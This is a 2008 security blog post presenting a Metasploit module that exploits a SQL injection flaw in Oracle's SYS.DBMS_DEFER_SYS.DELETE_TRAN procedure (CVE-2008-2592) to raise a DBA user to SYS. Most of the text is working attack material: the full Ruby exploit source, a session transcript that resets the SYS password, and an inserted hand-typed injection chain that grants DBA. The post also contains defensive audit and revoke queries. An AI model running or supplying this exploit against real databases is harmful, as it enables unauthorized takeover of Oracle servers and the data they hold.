Oracle Pwnage Part 6 from DBA to SYS
Source: CG |at| carnal0wnage |dot| com   Author: CG   Published: 2008-12-24

In some of the past posts I covered finding a default Oracle account, or an account with an easy-to-guess username/password, and taking that user to DBA via SQL injection in Oracle packages.

I've been neglecting the blog a bit while porting some of the public SQLI for Oracle into Metasploit auxiliary modules. Not sure when it's going to be put into the trunk, but it will be at some point; I think MC is working on the mixin to reduce the dependence on the Oracle instantclient.

Anyway, it being the week of Christmas (or whatever you celebrate), I thought I'd put out a module for a vulnerability that has an advisory out but no exploit code.

So...coverage for:
http://www.appsecinc.com/resources/alerts/oracle/2008-05.shtml

Details:
The PL/SQL package DBMS_DEFER_SYS owned by SYS has an instance of SQL Injection in the DELETE_TRAN procedure. A malicious user can call the vulnerable procedure of this package with specially crafted parameters and execute SQL statements with the elevated privileges of SYS user.

Impact:
Any Oracle database user with EXECUTE privilege on the package SYS.DBMS_DEFER_SYS can exploit this vulnerability. By default, users granted DBA have the required privilege. Exploitation of this vulnerability allows an attacker to execute SQL commands with SYS privileges.
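Before running the module against a target, or when auditing a database for exposure to this advisory, the queries below enumerate who can actually reach SYS.DBMS_DEFER_SYS and whether the advisory's precondition holds. This is an added example and not part of the original post or the advisory; it runs as any user with SELECT on the DBA_* and V$ views, assumes DBA_REGISTRY_HISTORY exists (it appears with 10.2, so it is absent on the 9i/10gR1 targets in the post), and the grantee in the commented REVOKE is a placeholder.

```sql
-- Added example (not from the original post). Run as a user who can read the DBA_* views.

-- 1. Direct grantees of EXECUTE on the vulnerable package. Roles show up as
--    grantees too; resolve their members with the second query.
SELECT grantee, privilege, grantable
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name = 'DBMS_DEFER_SYS'
 ORDER BY grantee;

-- 2. Everyone holding DBA (the advisory says these users can call the package by default).
SELECT grantee, admin_option
  FROM dba_role_privs
 WHERE granted_role = 'DBA'
 ORDER BY grantee;

-- 3. Precondition from the Full-Disclosure post: with O7_DICTIONARY_ACCESSIBILITY=FALSE
--    (the default) a DBA cannot alter SYS-owned objects, which is why this
--    injection is the step from DBA to SYS rather than a no-op.
SELECT name, value
  FROM v$parameter
 WHERE LOWER(name) = 'o7_dictionary_accessibility';

-- 4. Has the July 2008 CPU (or later) been applied? Assumes 10.2+, where
--    DBA_REGISTRY_HISTORY records CPU/PSU application.
SELECT action_time, action, version, comments
  FROM dba_registry_history
 ORDER BY action_time;

-- 5. Containment for an unpatched server: remove EXECUTE from any grantee that
--    does not need deferred-transaction (replication) administration.
-- REVOKE EXECUTE ON SYS.DBMS_DEFER_SYS FROM <grantee>;
```

If query 1 lists only roles, the practical exposure is the union of those roles' members; on the targets in the post the package is reachable by every DBA, which is exactly the population the module needs.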

Let's see it in action, assuming we got DBA from one of the other SQLI modules.

SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
HACKER                         DBA                            NO  YES NO

SQL> alter user SYS identified by 0raclefun;
alter user SYS identified by 0raclefun
*
ERROR at line 1:
ORA-01031: insufficient privileges

msf auxiliary(dbms_defer_sys) > set SQL "alter user sys identified by 0raclefun"
SQL => alter user sys identified by 0raclefun
msf auxiliary(dbms_defer_sys) > run

[*] Sending function..
[*] Done...
[*] Calling SYS.DBMS_DEFER_SYS.DELETE_TRAN...
[*] Done...
[*] Auxiliary module execution completed

cg@WPAD:~/oracle$ sqlplus sys/0raclefun@172.16.102.128/oracle as sysdba

SQL*Plus: Release 11.1.0.6.0 - Production on Fri Dec 19 17:43:57 2008

Copyright (c) 1982, 2007, Oracle. All rights reserved.

Connected to:
Oracle Database 10g Enterprise Edition Release 10.1.0.3.0 - Production
With the Partitioning, OLAP and Data Mining options

SQL> select user from dual;

USER
------------------------------
SYS

SQL>

Tested on 9i and 10g release 1
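The same chain typed by hand in SQL*Plus, as an added example that is not part of the original post or the module: the helper function and the crafted DELETE_TRAN argument are exactly what the module sends, shown here so the injection can be read without the Ruby string quoting in the way. The function name PWN and the target user SCOTT are assumptions for illustration (SCOTT is the module's default), and the session is assumed to be the DBA user HACKER from the transcript above.

```sql
-- Added example (not from the original post). Run as HACKER (DBA) in SQL*Plus.

-- 1. Helper function in the attacker's schema. AUTHID CURRENT_USER makes it run
--    with the privileges of whoever invokes it, and the autonomous transaction
--    lets the DDL COMMIT inside the query that DELETE_TRAN is building.
--    Any single quote inside the statement string must be doubled.
CREATE OR REPLACE FUNCTION pwn RETURN NUMBER AUTHID CURRENT_USER AS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';
  COMMIT;
  RETURN 0;
END;
/

-- 2. Inject the call. The literal '''||HACKER.PWN||''' is the string
--    '||HACKER.PWN||'. DELETE_TRAN concatenates its first argument unescaped
--    into its own SQL, so HACKER.PWN is evaluated with SYS privileges.
BEGIN
  SYS.DBMS_DEFER_SYS.DELETE_TRAN('''||HACKER.PWN||''', '');
END;
/

-- 3. Verify: SCOTT now holds DBA. On a server with the July 2008 CPU applied
--    nothing changes, because the argument is no longer interpreted as SQL.
SELECT grantee, granted_role
  FROM dba_role_privs
 WHERE grantee = 'SCOTT';

-- 4. Remove the helper so the schema is left as it was found.
DROP FUNCTION pwn;
```

To reproduce the post's own demo instead, swap the EXECUTE IMMEDIATE statement for ALTER USER sys IDENTIFIED BY <password> and then connect with "as sysdba" as shown in the transcript; on 10g passwords are case-insensitive, so the case the statement is typed in does not matter there.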

codez available here: http://www.carnal0wnage.com/research/dbms_defer_sys.rb

It's definitely a work in progress, so if you have feedback, send it.

----------------------------------------code-------------------------------------------

##
# $Id: dbms_defer_sys.rb
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'


class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::ORACLE

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'SQL Injection via SYS.DBMS_DEFER_SYS',
			'Description'    => %q{
					This module exploits a SQL injection vulnerability in the
					SYS.DBMS_DEFER_SYS package. Any Oracle database user with
					EXECUTE privilege on the package SYS.DBMS_DEFER_SYS can
					exploit this vulnerability; by default, users granted DBA
					have the required privilege. Exploitation of this
					vulnerability allows an attacker to execute SQL commands
					with SYS privilege. Affected versions: Oracle Database
					Server versions 9iR1, 9iR2, 10gR1, 10gR2 and 11gR1.
					Fixed with Oracle Critical Patch Update July 2008.
					See additional comments in source.
			},
			'Author'         => 'CG |at| carnal0wnage |dot| com',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: $',
			'References'     =>
				[
					[ 'CVE', '2008-2592' ],
					[ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-05.shtml' ],
					[ 'URL', 'http://seclists.org/fulldisclosure/2008/Aug/0229.html' ],
				],
			'DisclosureDate' => 'Jul 29 2008'))

		register_options(
			[
				# DBA is registered but not yet used by run; SQL carries the statement.
				OptString.new('DBA', [ false, 'DB user to elevate to DBA.', 'SCOTT' ]),
				OptString.new('SQL', [ false, 'The SQL to execute.', 'GRANT DBA TO SCOTT' ]),
			], self.class)
	end

	# from: http://seclists.org/fulldisclosure/2008/Aug/0229.html
	# The DBA role in Oracle Database is not the same as SYSDBA privilege,
	# which is granted to SYS. There are many things that a user granted the
	# DBA role can't do - the most important being the ability to alter SYS
	# owned objects. This is true on databases where
	# O7_DICTIONARY_ACCESSIBILITY=FALSE (default value).
	# read the rest of the FD post for more usage ideas

	def run
		c = connect

		# Random name for the helper function created in the attacker's own schema.
		p = Rex::Text.rand_text_alpha(rand(8) + 1)

		# upcase also uppercases quoted literals, so a password set through this
		# module is stored uppercased (harmless on 9i/10g, where passwords are
		# case-insensitive; on 11g log in with the uppercased value).
		# Single quotes are doubled so the statement survives being embedded in
		# the EXECUTE IMMEDIATE string literal below.
		query = datastore['SQL'].upcase.gsub("'", "''")

		# fun queries
		# set SQL "alter user SYS identified by my!supersecretpassword"
		# connect as: sys/my!supersecretpassword@IP/SID as sysdba
		# set SQL "GRANT DBA to user"

		# Helper function: AUTHID CURRENT_USER so it runs with the privileges of
		# whoever evaluates it (SYS, once DELETE_TRAN does), and an autonomous
		# transaction so the DDL can COMMIT from inside the injected query.
		function = "
			CREATE OR REPLACE FUNCTION #{p} RETURN NUMBER AUTHID CURRENT_USER AS
			PRAGMA AUTONOMOUS_TRANSACTION;
			BEGIN
				EXECUTE IMMEDIATE '#{query}';
				COMMIT;
				RETURN(0);
			END;
		"

		# so far I haven't figured out how to see the output of the query with this module
		# The user executing this module will have to be DBA or have execute
		# privileges on the SYS.DBMS_DEFER_SYS package (which is just DBA by default)
		#
		# The first argument evaluates to the string '||<schema>.<p>||' , which
		# DELETE_TRAN concatenates unescaped into its own SQL, so the helper
		# function is invoked with SYS privileges.
		call = "
			BEGIN
				SYS.DBMS_DEFER_SYS.DELETE_TRAN ('''||'||user||'.#{p}||''','');
			END;
		"

		print_status("Sending function..")
		prepare_exec(function)
		print_status("Calling SYS.DBMS_DEFER_SYS.DELETE_TRAN...")
		prepare_exec(call)

		c.disconnect
	end

end
 